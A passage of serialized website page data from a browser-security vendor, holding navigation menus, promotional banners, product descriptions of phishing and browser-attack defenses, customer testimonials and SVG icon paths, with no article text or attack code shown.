[{"data":1,"prerenderedAt":2216},["ShallowReactive",2],{"application-flags":3,"navbar":7,"always-visible-banner":35,"trust-badges":98,"solution-nav":119,"mega-nav":264,"fa-icon-solid-faDisplay":419,"fa-icon-solid-faFilter":422,"fa-icon-solid-faCloudArrowUp":424,"fa-icon-solid-faEnvelope":427,"fa-icon-sharp-regular-faUserSecret":429,"fa-icon-sharp-regular-faBrainCircuit":432,"fa-icon-sharp-regular-faShieldCheck":434,"fa-icon-sharp-regular-faRadar":436,"fa-icon-solid-faMobileScreenButton":438,"fa-icon-sharp-regular-faSatelliteDish":441,"fa-icon-brands-faChrome":443,"fa-icon-sharp-regular-faPenNib":445,"fa-icon-sharp-regular-faBooks":447,"fa-icon-sharp-regular-faBriefcase":449,"fa-icon-sharp-regular-faBookOpenCover":451,"fa-icon-sharp-regular-faBrowser":453,"fa-icon-sharp-regular-faBook":455,"fa-icon-sharp-regular-faGrid":457,"fa-icon-sharp-regular-faBuilding":459,"fa-icon-sharp-regular-faHandshakeSimple":461,"fa-icon-sharp-regular-faArrowTrendUp":463,"fa-icon-sharp-regular-faCalendarStar":465,"fa-icon-sharp-regular-faNewspaper":467,"fa-icon-sharp-regular-faUsers":469,"fa-icon-sharp-regular-faMessagesQuestion":471,"blog\u002Fanalyzing-the-latest-ai-themed-malware-delivery-attacks":473,"blog-topics":1815},[4],{"name":5,"enabled":6},"maintenanceMode",false,[8],{"createdDate":9,"id":10,"name":11,"modelId":12,"published":13,"meta":14,"query":20,"data":21,"variations":26,"lastUpdated":27,"firstPublished":28,"testRatio":29,"createdBy":30,"lastUpdatedBy":31,"folders":32,"lastUpdateSource":33,"stageModifiedSincePublish":6,"rev":34},1742208588866,"1c7a4e423bf54ac1a328bb4063459ef2","Banner","1c6207a5f24948ab82d4a0b17f251193","published",{"breakpoints":15,"hasAutosaves":6,"hasErrors":6,"kind":19},{"medium":16,"small":17,"xsmall":18},768,640,320,"data",[],{"link":22,"text":23,"type":24,"url":25},{},"Get the latest stats and analysis on browser-based attacks","web-banner","https:\u002F\u002Fpushsecurity.com\u002Fresources\u002Fbrowser-attacks",{},1790775413052,1742208637545,1,"CydmZnOWU1XuAaLhEDCoYNM4Z8W2","jKjF9r5jcvXU8tzZEfFQm31Iyvr2",[],null,"2xch6g7yypc",{"createdBy":36,"createdDate":37,"data":38,"folders":86,"id":87,"lastUpdated":88,"lastUpdatedBy":36,"meta":89,"modelId":92,"name":93,"published":13,"query":94,"testRatio":29,"variations":95,"firstPublished":96,"stageModifiedSincePublish":6,"lastUpdateSource":33,"rev":97},"ST0tXQM8slWpFrmioqKHmENB2qe2",1774965361051,{"ctaText":39,"text":40,"url":41,"blocks":42,"state":82},"ewrererw","testrfesssssssssss","",[43,71],{"@type":44,"@version":45,"id":46,"component":47,"responsiveStyles":61},"@builder.io\u002Fsdk:Element",2,"builder-ca12c06a52de41d7b8743da53118cd38",{"name":48,"tag":48,"options":49,"isRSC":33},"TopBannerContent",{"text":50,"ctaText":51,"url":52,"mainText":53,"cta":56,"styleVariant":59,"showMonsters":60},"New Webinar Series: Join John Hammond, Troy Hunt, and Matt Johansen for the State of Browser Attacks","Save Your Spot","https:\u002F\u002Fpushsecurity.com\u002Fwebinar\u002Fstate-of-browser-security",{"content":54,"fontSize":55},"\u003Cp class=\"\">Shadow AI monsters are lurking in the dark! Bust them all in our retro-inspired arcade game.\u003C\u002Fp>","text-base",{"content":57,"fontSize":55,"url":58},"\u003Cp class=\"\">Press start &gt;&gt;\u003C\u002Fp>","https:\u002F\u002Fpushsecurity.com\u002Flp\u002Fshadow-ai-busters","arcade",true,{"large":62},{"display":63,"flexDirection":64,"position":65,"flexShrink":66,"boxSizing":67,"marginTop":68,"marginBottom":68,"fontSize":69,"fontWeight":70},"flex","column","relative","0","border-box",".56rem","1.125rem","700",{"id":72,"@type":44,"tagName":73,"properties":74,"responsiveStyles":77},"builder-pixel-z8at1ozq7r","img",{"src":75,"aria-hidden":76,"alt":41,"width":66,"height":66},"https:\u002F\u002Fcdn.builder.io\u002Fapi\u002Fv1\u002Fpixel?apiKey=f3a1111ff5be48cdbb123cd9f5795a05","true",{"large":78},{"height":66,"width":66,"display":79,"opacity":66,"overflow":80,"pointerEvents":81},"block","hidden","none",{"deviceSize":83,"location":84},"large",{"path":41,"query":85},{},[],"fd266d0172cc47429be7ad10f48c99ad",1789552629325,{"breakpoints":90,"hasAutosaves":60,"hasErrors":6,"hasLinks":6,"kind":91},{"medium":16,"small":17,"xsmall":18},"component","0678d178ec8b41efb8a23c09dba7874d","always visible banner",[],{},1774968080803,"woiop4csqwc",[99,103,107,111,115],{"title":100,"logo":101,"createdDate":102},"SOC2","https:\u002F\u002Fcdn.builder.io\u002Fapi\u002Fv1\u002Fimage\u002Fassets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fb6727a5e00004d6e9e69fc3068b8b64c",1784291539953,{"title":104,"logo":105,"createdDate":106},"GDPR","https:\u002F\u002Fcdn.builder.io\u002Fapi\u002Fv1\u002Fimage\u002Fassets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Ffe49f53211674deaa5a6640d929cdf42?format=webp",1784291672535,{"title":108,"logo":109,"createdDate":110},"Cyber essentials","https:\u002F\u002Fcdn.builder.io\u002Fapi\u002Fv1\u002Fimage\u002Fassets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F53558c1045a342a7a28def960cd54ae7?format=webp",1784291702710,{"title":112,"logo":113,"createdDate":114},"ISO IEC 27001","https:\u002F\u002Fcdn.builder.io\u002Fapi\u002Fv1\u002Fimage\u002Fassets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F578a404a61cf45db951a41fe3554d12d",1784291766222,{"title":116,"logo":117,"createdDate":118},"ISO IEC 27701","https:\u002F\u002Fcdn.builder.io\u002Fapi\u002Fv1\u002Fimage\u002Fassets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fbe219844b13242fbba531959579a753c",1784291858848,[120,189,234],{"id":121,"label":122,"text":41,"navIcon":123,"items":124},"stop-browser-based-attacks","Stop browser-based attacks","solid:faShieldHalved",[125,130,135,140,145,150,155,160,165,169,174,179,184],{"title":126,"text":127,"url":128,"navIcon":129},"Phishing","Detect phishing behaviorally in the browser, regardless of the payload or delivery channel.","\u002Fsolution\u002Fstop-browser-based-attacks\u002Fzero-day-phishing","sharp-regular:faFishingRod",{"title":131,"text":132,"url":133,"navIcon":134},"Adversary-in-the-Middle","Detect and block MFA-bypassing AiTM phishing pages in real-time.","\u002Fsolution\u002Fstop-browser-based-attacks\u002Fadversary-in-the-middle-attacks","solid:faUserSecret",{"title":136,"text":137,"url":138,"navIcon":139},"ClickFix (and variants)","Intercept malicious copy and paste attacks at the point of interaction.","\u002Fsolution\u002Fstop-browser-based-attacks\u002Fclickfix-fix-variants","sharp-regular:faLaptopCode",{"title":141,"text":142,"url":143,"navIcon":144},"Device code phishing","Detect and block device code phishing kits designed to get around passkeys.","\u002Fsolution\u002Fstop-browser-based-attacks\u002Fdevice-code-phishing","solid:faTabletScreenButton",{"title":146,"text":147,"url":148,"navIcon":149},"Consent phishing","Detect and block malicious OAuth consent grants before access is authorized.","\u002Fsolution\u002Fstop-browser-based-attacks\u002Fconsent-phishing","solid:faThumbsUp",{"title":151,"text":152,"url":153,"navIcon":154},"Malicious OAuth integrations","Detect and block the root cause of SaaS supply chain attacks.","\u002Fsolution\u002Fstop-browser-based-attacks\u002Fmalicious-oauth-integrations","solid:faPlugCircleXmark",{"title":156,"text":157,"url":158,"navIcon":159},"Malicious browser extensions","Inventory, monitor, and block risky browser extensions.","\u002Fsolution\u002Fstop-browser-based-attacks\u002Fmalicious-browser-extensions","sharp-regular:faPuzzlePiece",{"title":161,"text":162,"url":163,"navIcon":164},"Malicious file downloads","Control which files users can download by type, source, and user group.","\u002Fsolution\u002Fstop-browser-based-attacks\u002Fmalicious-file-downloads","solid:faFileCircleXmark",{"title":166,"text":167,"url":168,"navIcon":164},"Infostealers","Detect infostealer delivery and respond to a compromise.","\u002Fsolution\u002Fstop-browser-based-attacks\u002Finfostealer-malware",{"title":170,"text":171,"url":172,"navIcon":173},"Ghost logins","Surface hidden login paths that bypass SSO and expose accounts.","\u002Fsolution\u002Fstop-browser-based-attacks\u002Fghost-logins","solid:faGhost",{"title":175,"text":176,"url":177,"navIcon":178},"Mobile phishing (QR & SMS)","Detect phishing regardless of whether it arrives via email, SMS, or QR code.","\u002Fsolution\u002Fstop-browser-based-attacks\u002Fmobile-phishing-qr-code-sms","solid:faQrcode",{"title":180,"text":181,"url":182,"navIcon":183},"Credential stuffing","Identify reused and compromised credentials across SaaS logins.","\u002Fsolution\u002Fstop-browser-based-attacks\u002Fcredential-stuffing","custom:credentialStuffing",{"title":185,"text":186,"url":187,"navIcon":188},"Session hijacking","Detect and respond to stolen session token replay with browser session markers.","\u002Fsolution\u002Fstop-browser-based-attacks\u002Fsession-hijacking","solid:faCookieBite",{"id":190,"label":191,"text":41,"navIcon":192,"items":193},"achieve-security-outcomes","Achieve security outcomes","solid:faCheckToSlot",[194,199,204,209,214,219,224,229],{"title":195,"text":196,"url":197,"navIcon":198},"Stop account takeover","Stop ATO with stolen credential and compromised token detection","\u002Fsolution\u002Fachieve-security-outcomes\u002Fstop-account-takeover","sharp-regular:faUserSecret",{"title":200,"text":201,"url":202,"navIcon":203},"Harden unmanaged identities","Harden access paths with visibility, detection, and guardrails","\u002Fsolution\u002Fachieve-security-outcomes\u002Fharden-unmanaged-identities","sharp-regular:faRadar",{"title":205,"text":206,"url":207,"navIcon":208},"Investigate browser-related incidents","Investigate and respond faster with unique browser telemetry","\u002Fsolution\u002Fachieve-security-outcomes\u002Finvestigate-browser-related-incidents","sharp-regular:faSatelliteDish",{"title":210,"text":211,"url":212,"navIcon":213},"Secure shadow IT","See and control shadow SaaS in the browser","\u002Fsolution\u002Fachieve-security-outcomes\u002Fsecure-shadow-saas","sharp-regular:faShieldCheck",{"title":215,"text":216,"url":217,"navIcon":218},"Secure AI","See and control AI apps in the browser","\u002Fsolution\u002Fachieve-security-outcomes\u002Fsecure-ai","sharp-regular:faBrainCircuit",{"title":220,"text":221,"url":222,"navIcon":223},"Secure BYOD","Extend security to unmanaged devices without MDM","\u002Fsolution\u002Fachieve-security-outcomes\u002Fsecure-bring-your-own-device","solid:faMobileScreenButton",{"title":225,"text":226,"url":227,"navIcon":228},"Secure Chromebooks","Protect Chromebooks against in-browser attacks","\u002Fsolution\u002Fachieve-security-outcomes\u002Fsecure-chromebooks","brands:faChrome",{"title":230,"text":231,"url":232,"navIcon":233},"Data loss prevention","Enforce DLP at the point of interaction in the browser","\u002Fsolution\u002Fachieve-security-outcomes\u002Finvestigate-and-stop-data-loss","custom:investigateAndStopDataLoss",{"id":235,"label":236,"text":41,"navIcon":237,"items":238},"tool-replacements","Tool replacements","solid:faScrewdriverWrench",[239,244,249,254,259],{"title":240,"text":241,"url":242,"navIcon":243},"Email Security","Stop phishing outside of the inbox.","\u002Fsolution\u002Ftool-replacements\u002Femail-security","faEnvelope",{"title":245,"text":246,"url":247,"navIcon":248},"Remote browser isolation","Detect attacks that happen inside the browser session.","\u002Fsolution\u002Ftool-replacements\u002Fremote-browser-isolation","solid:faDisplay",{"title":250,"text":251,"url":252,"navIcon":253},"Secure web gateways","Detect attacks inside the browser after SWGs allowed the connection.","\u002Fsolution\u002Ftool-replacements\u002Fsecure-web-gateways","solid:faFilter",{"title":255,"text":256,"url":257,"navIcon":258},"CASB alternative","Catch browser-based identity threats in real time, not after the fact.","\u002Fsolution\u002Ftool-replacements\u002Fcloud-access-security-broker","solid:faCloudArrowUp",{"title":260,"text":261,"url":262,"navIcon":263},"Security awareness training","Block real phishing instead of training users on simulations.","\u002Fsolution\u002Ftool-replacements\u002Fsecurity-awareness-training","custom:securityAwareness",[265,293,354],{"id":266,"columns":267},"Solution",[268,283],{"kind":269,"heading":270,"span":29,"links":271},"links","Compare Push",[272,275,277,279,281],{"title":273,"url":247,"text":246,"navIcon":248,"variant":274},"vs Remote Browser Isolation","compact",{"title":276,"url":252,"text":251,"navIcon":253,"variant":274},"vs Secure Web Gateways",{"title":278,"url":257,"text":256,"navIcon":258,"variant":274},"vs Cloud Access Security Broker",{"title":280,"url":262,"text":261,"navIcon":263,"variant":274},"vs Security Awareness Training",{"title":282,"url":242,"text":241,"navIcon":243,"variant":274},"+ Email Security",{"kind":269,"heading":266,"span":45,"links":284},[285,286,287,288,289,290,291,292],{"title":195,"url":197,"text":196,"navIcon":198},{"title":215,"url":217,"text":216,"navIcon":218},{"title":230,"url":232,"text":231,"navIcon":233},{"title":210,"url":212,"text":211,"navIcon":213},{"title":200,"url":202,"text":201,"navIcon":203},{"title":220,"url":222,"text":221,"navIcon":223},{"title":205,"url":207,"text":206,"navIcon":208},{"title":225,"url":227,"text":226,"navIcon":228},{"id":294,"columns":295},"resources",[296,321,339],{"kind":269,"heading":297,"span":29,"links":298},"Resources",[299,306,311,316],{"title":300,"url":301,"text":302,"navIcon":303,"variant":304,"badge":305},"Research blog","\u002Fblog","Latest threat research and insights","sharp-regular:faPenNib","featured","Latest",{"title":307,"url":308,"text":309,"navIcon":310},"Resource library","\u002Fresources","Check out our webinars and downloads","sharp-regular:faBooks",{"title":312,"url":313,"text":314,"navIcon":315},"Customer stories","\u002Fcustomer-stories","What customers love about Push","sharp-regular:faBriefcase",{"title":317,"url":318,"text":319,"navIcon":320},"Help center","\u002Fhelp\u002Faudience\u002Fadministrators","Guides for employees and admins","sharp-regular:faBookOpenCover",{"kind":269,"heading":322,"span":29,"links":323},"Learn",[324,329,334],{"title":325,"url":326,"text":327,"navIcon":328},"Browser attacks in 2026","\u002Fresources\u002Fbrowser-attacks","The latest stats & analysis","sharp-regular:faBrowser",{"title":330,"url":331,"text":332,"navIcon":333},"Browser attacks glossary","\u002Fresources\u002Fbrowser-attacks-glossary","Understand the threat landscape","sharp-regular:faBook",{"title":335,"url":336,"text":337,"navIcon":338},"Browser attacks matrix","\u002Fresources\u002Fbrowser-identity-attacks-matrix","MITRE-inspired resource for red & blue teams","sharp-regular:faGrid",{"kind":294,"heading":340,"cards":341},"Latest resources",[342,348],{"title":343,"description":344,"cta":345,"background":347},"Browser-based attacks: the 2026 threat landscape","Half of attacks now reach victims outside of email. ClickFix is now the dominant browser attack technique. Get the latest stats and analysis from the Push Security team.",{"text":346,"url":326},"Read the report","orange",{"title":349,"description":350,"cta":351,"background":353},"The browser & identity attacks matrix","Check out the MITRE-inspired matrix of browser & identity attack techniques for red and blue teams. Get involved on GitHub.",{"text":352,"url":336},"Explore the matrix","black",{"id":355,"columns":356},"About",[357,375,398],{"kind":269,"heading":358,"span":29,"links":359},"Get to know us",[360,365,370],{"title":361,"url":362,"text":363,"navIcon":364},"About us","\u002Fabout","Meet the team and learn what drives us","sharp-regular:faBuilding",{"title":366,"url":367,"text":368,"navIcon":369},"Partners","\u002Fpartner","Become a partner and access resources","sharp-regular:faHandshakeSimple",{"title":371,"url":372,"text":373,"navIcon":374},"Investors","\u002Fabout#investors","Learn more about our investors and advisors","sharp-regular:faArrowTrendUp",{"kind":269,"heading":376,"span":29,"links":377},"Keep up with us",[378,383,388,393],{"title":379,"url":380,"text":381,"navIcon":382},"Events","\u002Fevents","See upcoming webinars and in-person events","sharp-regular:faCalendarStar",{"title":384,"url":385,"text":386,"navIcon":387},"News","\u002Fnews","Stay up to date on company news","sharp-regular:faNewspaper",{"title":389,"url":390,"text":391,"navIcon":392},"Careers","\u002Fcareers","Explore open roles","sharp-regular:faUsers",{"title":394,"url":395,"text":396,"navIcon":397},"Contact us","\u002Fcontact","Have a question? We're here to help","sharp-regular:faMessagesQuestion",{"kind":399,"heading":400,"testimonials":401},"testimonials","What customers say",[402,409,414],{"quote":403,"author":404,"jobTitle":405,"image":406,"url":313,"ctaText":407,"background":408},"Security is only as good as its weakest link. From day one, Push found the gaps that would allow attackers to circumvent our controls. We use Push every day — they're one of my favourite teams to work with.","Jason Waits","\u003Cp>CISO, Inductive Automation\u003C\u002Fp>","https:\u002F\u002Fcdn.builder.io\u002Fapi\u002Fv1\u002Fimage\u002Fassets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Ff04c0c0689ce4a89ac0f0708d78c0a07","Read the customer story","white",{"quote":410,"author":411,"jobTitle":412,"image":413,"url":313,"ctaText":407,"background":408},"I'm not going to be able to shove a browser on everybody. I need to be able to support them where they are. Push gave us the visibility and control we needed while allowing people to choose their paths.","Myke Lyons","\u003Cp>CISO, Cribl\u003C\u002Fp>","https:\u002F\u002Fcdn.builder.io\u002Fapi\u002Fv1\u002Fimage\u002Fassets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F61920ec05c7a45b4b2259b8dded43c9b",{"quote":415,"author":416,"jobTitle":417,"image":418,"url":313,"ctaText":407,"background":408},"No matter the channel for phishing — email, LinkedIn, text — the employee clicks a link that opens a browser session. We see the main control point moving from the endpoint to the browser.","Ash Devata","\u003Cp>CEO, GreyNoise\u003C\u002Fp>","https:\u002F\u002Fcdn.builder.io\u002Fapi\u002Fv1\u002Fimage\u002Fassets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F392c75ae282342008130cf1147c20e82",{"w":420,"h":420,"d":421},512,"M448 96l0 256-384 0 0-256 384 0zM64 32C28.7 32 0 60.7 0 96L0 352c0 35.3 28.7 64 64 64l144 0-16 48-72 0c-13.3 0-24 10.7-24 24s10.7 24 24 24l272 0c13.3 0 24-10.7 24-24s-10.7-24-24-24l-72 0-16-48 144 0c35.3 0 64-28.7 64-64l0-256c0-35.3-28.7-64-64-64L64 32z",{"w":420,"h":420,"d":423},"M32 64C19.1 64 7.4 71.8 2.4 83.8S.2 109.5 9.4 118.6L192 301.3 192 416c0 8.5 3.4 16.6 9.4 22.6l64 64c9.2 9.2 22.9 11.9 34.9 6.9S320 492.9 320 480l0-178.7 182.6-182.6c9.2-9.2 11.9-22.9 6.9-34.9S492.9 64 480 64L32 64z",{"w":425,"h":420,"d":426},576,"M144 480c-79.5 0-144-64.5-144-144 0-63.4 41-117.2 97.9-136.5-1.3-7.7-1.9-15.5-1.9-23.5 0-79.5 64.5-144 144-144 55.4 0 103.5 31.3 127.6 77.1 14.2-8.3 30.8-13.1 48.4-13.1 53 0 96 43 96 96 0 15.7-3.8 30.6-10.5 43.7 44 20.3 74.5 64.7 74.5 116.3 0 70.7-57.3 128-128 128l-304 0zM305 191c-9.4-9.4-24.6-9.4-33.9 0l-72 72c-9.4 9.4-9.4 24.6 0 33.9s24.6 9.4 33.9 0l31-31 0 102.1c0 13.3 10.7 24 24 24s24-10.7 24-24l0-102.1 31 31c9.4 9.4 24.6 9.4 33.9 0s9.4-24.6 0-33.9l-72-72z",{"w":420,"h":420,"d":428},"M48 64c-26.5 0-48 21.5-48 48 0 15.1 7.1 29.3 19.2 38.4l208 156c17.1 12.8 40.5 12.8 57.6 0l208-156c12.1-9.1 19.2-23.3 19.2-38.4 0-26.5-21.5-48-48-48L48 64zM0 196L0 384c0 35.3 28.7 64 64 64l384 0c35.3 0 64-28.7 64-64l0-188-198.4 148.8c-34.1 25.6-81.1 25.6-115.2 0L0 196z",{"w":430,"h":420,"d":431},448,"M144-16l-48 112-48 0 0 48 48 0 0 32c0 17 3.3 33.2 9.3 48l-73.3 0 0 32 5.3 16 26.7 80-64 160 51.7 0 56.9-142.2 6.5-16.3c-1-3.1-10.1-30.3-27.2-81.5l51.4 0c22.6 19.9 52.2 32 84.7 32s62.1-12.1 84.7-32l51.4 0c-17.1 51.2-26.1 78.4-27.2 81.5l6.5 16.3 56.9 142.2 51.7 0-64-160 26.7-80 5.3-16 0-32-73.3 0c6-14.8 9.3-31 9.3-48l0-32 48 0 0-48-48 0-48-112-32 0-48 32-48-32-32 0zm80 272c-32.8 0-61-19.7-73.3-48l57.3 0 16-40 16 40 57.3 0c-12.3 28.3-40.5 48-73.3 48zm17.5 139.6l30.5-35.6 0-24-96 0 0 24 30.5 35.6-46.5 116.4 128 0-46.5-116.4z",{"w":420,"h":420,"d":433},"M192 48l40 0 0 108-12.4 0c-7.6-16.5-24.3-28-43.6-28-26.5 0-48 21.5-48 48s21.5 48 48 48c19.4 0 36.1-11.5 43.6-28l12.4 0 0 56-92 0 0 56.4c-16.5 7.6-28 24.3-28 43.6 0 26.5 21.5 48 48 48s48-21.5 48-48c0-19.4-11.5-36.1-28-43.6l0-16.4 52 0 0 172-40 0c-16.8 0-31.2-10.3-37.1-25.1l-6.4-16-17.2 1c-1.1 .1-2.2 .1-3.2 .1-30.9 0-56-25.1-56-56 0-9.5 2.4-18.5 6.5-26.3l8.7-16.2-13.4-12.6c-11-10.2-17.8-24.8-17.8-40.9 0-21.6 12.2-40.4 30.3-49.8l22.6-11.7-13.1-21.9c-5-8.4-7.9-18.1-7.9-28.6 0-30.9 25.1-56 56-56l24 0 0-32c0-13.3 10.7-24 24-24zm88 148l12.4 0c7.6 16.5 24.3 28 43.6 28 26.5 0 48-21.5 48-48s-21.5-48-48-48c-19.4 0-36.1 11.5-43.6 28l-12.4 0 0-108 40 0c13.3 0 24 10.7 24 24l0 32 24 0c30.9 0 56 25.1 56 56 0 10.5-2.9 20.3-7.9 28.6l-13.1 21.9 22.6 11.7c18 9.3 30.3 28.1 30.3 49.8 0 16.1-6.8 30.7-17.8 40.9l-13.4 12.6 8.7 16.2c4.2 7.8 6.5 16.7 6.5 26.3 0 30.9-25.1 56-56 56-1.1 0-2.2 0-3.2-.1l-17.2-1-6.4 16C351.2 453.7 336.8 464 320 464l-40 0 0-76 92 0 0-56.4c16.5-7.6 28-24.3 28-43.6 0-26.5-21.5-48-48-48s-48 21.5-48 48c0 19.4 11.5 36.1 28 43.6l0 16.4-52 0 0-152zM192 512l128 0c31.1 0 58.4-16.2 74.1-40.5 52.7-5.1 93.9-49.5 93.9-103.5 0-11.5-1.9-22.5-5.3-32.9 13.4-17.5 21.3-39.4 21.3-63.1 0-32-14.5-60.6-37.1-79.7 3.3-10.2 5.1-21.1 5.1-32.3 0-49.6-34.8-91.1-81.3-101.5-6.3-33.3-35.6-58.5-70.7-58.5L192 0c-35.1 0-64.4 25.2-70.7 58.5-46.5 10.4-81.3 51.9-81.3 101.5 0 11.3 1.8 22.2 5.1 32.3-22.7 19.1-37.1 47.7-37.1 79.7 0 23.7 8 45.6 21.3 63.1-3.5 10.4-5.3 21.4-5.3 32.9 0 54 41.2 98.5 93.9 103.5 15.6 24.3 42.9 40.5 74.1 40.5zM336 192a16 16 0 1 1 0-32 16 16 0 1 1 0 32zm32 96a16 16 0 1 1 -32 0 16 16 0 1 1 32 0zM176 352a16 16 0 1 1 -32 0 16 16 0 1 1 32 0zm16-176a16 16 0 1 1 -32 0 16 16 0 1 1 32 0z",{"w":420,"h":420,"d":435},"M267.6 4.5l207.5 80.5 19.2 7.4 1.2 20.5c2.9 50-4.9 126.3-37.3 200.9-32.7 75.2-91.1 150-189.4 192.5l-12.7 5.5-12.7-5.5C144.9 463.9 86.6 389.2 53.9 313.9 21.5 239.3 13.7 162.9 16.6 113L17.8 92.5 37 85 244.5 4.5 256 0 267.6 4.5zM64.1 126C63.1 169.5 71 232.9 97.9 294.8 126.1 359.7 175 422.4 256 459.6 337.1 422.4 385.9 359.7 414.2 294.8 441 232.9 449 169.5 448 126L256 51.5 64.1 126zm302.3 44.7L352.3 190.1 249.8 330.9 233 354c-8.8-9.1-30.9-32-66.2-68.6l-16.7-17.3 34.5-33.3c9.5 9.8 23.9 24.7 43.2 44.7l85.6-117.7 14.1-19.4 38.8 28.2z",{"w":420,"h":420,"d":437},"M497.4 49l17-17-33.9-33.9C473.6 4.9 453.3 25.2 419.7 58.8 375.4 22.1 318.5 0 256.4 0 115.1 0 .4 114.6 .4 256s114.6 256 256 256 256-114.6 256-256l-48 0c0 114.9-93.1 208-208 208s-208-93.1-208-208 93.1-208 208-208c48.8 0 93.7 16.8 129.1 44.9l-45.7 45.7c-23.5-16.8-52.3-26.6-83.4-26.6-79.5 0-144 64.5-144 144s64.5 144 144 144 144-64.5 144-144l-48 0c0 53-43 96-96 96s-96-43-96-96 43-96 96-96c17.8 0 34.5 4.8 48.8 13.3-52 52-79.5 79.5-82.7 82.7l33.9 33.9 17-17 224-224z",{"w":439,"h":420,"d":440},384,"M16 64C16 28.7 44.7 0 80 0L304 0c35.3 0 64 28.7 64 64l0 384c0 35.3-28.7 64-64 64L80 512c-35.3 0-64-28.7-64-64L16 64zm64 0l0 304 224 0 0-304-224 0zM192 472c17.7 0 32-14.3 32-32s-14.3-32-32-32-32 14.3-32 32 14.3 32 32 32z",{"w":420,"h":420,"d":442},"M208 0l24 0C386.6 0 512 125.4 512 280l0 24-48 0 0-24C464 151.9 360.1 48 232 48l-24 0 0-48zm24 96c101.6 0 184 82.4 184 184l0 24-48 0 0-24c0-75.1-60.9-136-136-136l-24 0 0-48 24 0zM48 256c0 114.9 93.1 208 208 208 22.9 0 45-3.7 65.6-10.5l-263-263C51.7 211 48 233.1 48 256zM0 256c0-36.5 7.6-71.3 21.4-102.7 6.7-15.3 14.9-29.9 24.4-43.5 7.7 7.7 61.5 61.5 161.2 161.2 30.5-30.5 49.5-49.5 57-57L297.9 248c-7.5 7.5-26.5 26.5-57 57 99.7 99.7 153.5 153.5 161.2 161.2-13.6 9.5-28.2 17.7-43.5 24.4-31.4 13.8-66.2 21.4-102.7 21.4-141.4 0-256-114.6-256-256z",{"w":420,"h":420,"d":444},"M0 256c0-46.6 12.5-90.4 34.3-128.9L144.1 318.3c21.9 39.2 63.8 65.7 111.9 65.7 14.3 0 27.1-2.3 40.8-6.6L220.5 509.6C95.9 492.3 0 385.3 0 256zm365.1 65.6c12.3-19.2 18.9-42.5 18.9-65.6 0-38.2-16.8-72.5-43.3-96l152.7 0c12 29.6 18.6 62.1 18.6 96 0 141.4-114.6 255.1-256 256L365.1 321.6zM477.8 128L256 128c-62.9 0-113.7 44.1-125.5 102.7L54.2 98.5C101 38.5 174 0 256 0 350.8 0 433.5 51.5 477.8 128zM344 256a88 88 0 1 1 -176 0 88 88 0 1 1 176 0z",{"w":425,"h":420,"d":446},"M406.1 198.1l0 0-3.6 10.7-56.3 168.8-221.5 69.9 98.5-98.5c5.2 1.9 10.8 3 16.7 3 26.5 0 48-21.5 48-48s-21.5-48-48-48-48 21.5-48 48c0 5.9 1.1 11.5 3 16.7l-98.5 98.5 69.9-221.5 168.8-56.3 10.8-3.6 0 0 60.1 60.1zM80 512l304-96 64-192c59.4-59.4 96.7-96.7 112-112-18.3-18.3-49.6-49.6-94.1-94.1L432-16C416.7-.7 379.4 36.6 320 96l-192 64-96 304 48 48z",{"w":425,"h":420,"d":448},"M404.8 45.3l12.4 46.4-77.3 20.7-12.4-46.4 77.3-20.7zm5.5 329.8l-58-216.4 77.3-20.7 58 216.4-77.3 20.7zm12.4 46.4l77.3-20.7 12.4 46.4-77.3 20.7-12.4-46.4zM315.1 19.6l-46.4 12.4 8.6 32-69.2 0 0-64-176 0 0 512 304 0 0-228.4c41.8 156.2 63.5 237.1 65.1 243 64.4-17.3 167.4-44.9 170-45.6l-12.4-46.4-107.7-401.8-12.4-46.4C413-6.6 371.7 4.4 315.1 19.6zM208.1 464l0-352 80 0 0 352-80 0zm-48-400l0 32-80 0 0-48 80 0 0 16zm0 80l0 224-80 0 0-224 80 0zm0 272l0 48-80 0 0-48 80 0z",{"w":420,"h":420,"d":450},"M168 0l-24 0 0 96-144 0 0 384 512 0 0-384-144 0 0-96-200 0zM464 256l-416 0 0-112 416 0 0 112zM320 304l144 0 0 128-416 0 0-128 144 0 0 48 128 0 0-48zm0-208l-128 0 0-48 128 0 0 48z",{"w":425,"h":420,"d":452},"M312 114.4l0 282.1 9.2-3.3C367.8 376.5 417 368 466.5 368l61.5 0 0-288-61.5 0c-38.5 0-76.7 6.6-113 19.6L312 114.4zM264 396.5l0-282.1-41.5-14.8C186.2 86.6 148 80 109.5 80l-61.5 0 0 288 61.5 0c49.5 0 98.7 8.5 145.3 25.2l9.2 3.3zM528 32l48 0 0 384-109.5 0c-44 0-87.7 7.6-129.2 22.4L288 456 238.6 438.4C197.2 423.6 153.5 416 109.5 416L0 416 0 32 109.5 32c44 0 87.7 7.6 129.2 22.4L288 72 337.4 54.4C378.8 39.6 422.5 32 466.5 32L528 32zM0 464l91.7 0c36.9 0 73.6 5 109.2 14.9l86.2 24 42.2-15.1c44-15.7 90.5-23.8 137.2-23.8l109.5 0 0 48-109.5 0c-41.3 0-82.2 7.1-121.1 21l-49.4 17.6-7.2 2.6-7.3-2-93.6-26c-31.4-8.7-63.8-13.1-96.4-13.1L0 512 0 464z",{"w":420,"h":420,"d":454},"M48 256l0 144 416 0 0-144-416 0zM0 64l512 0 0 384-512 0 0-384zm64 64l0 64 64 0 0-64-64 0zm120 8l-24 0 0 48 288 0 0-48-264 0z",{"w":430,"h":420,"d":456},"M24 0L0 0 0 432 .4 432c-.2 2.6-.4 5.3-.4 8l0 72 448 0 0-48-32 0 0-64 32 0 0-400-424 0zM368 400l0 64-320 0 0-24c0-22.1 17.9-40 40-40l280 0zM88 352c-14.4 0-28 3.5-40 9.6l0-313.6 352 0 0 304-312 0zm40-224l0 48 224 0 0-48-224 0zm224 96l-224 0 0 48 224 0 0-48z",{"w":420,"h":420,"d":458},"M112 64l0 48-48 0 0-48 48 0zM64 24l-40 0 0 128 128 0 0-128-88 0zm48 208l0 48-48 0 0-48 48 0zM64 192l-40 0 0 128 128 0 0-128-88 0zm0 208l48 0 0 48-48 0 0-48zM24 360l0 128 128 0 0-128-128 0zM280 64l0 48-48 0 0-48 48 0zM232 24l-40 0 0 128 128 0 0-128-88 0zm0 208l48 0 0 48-48 0 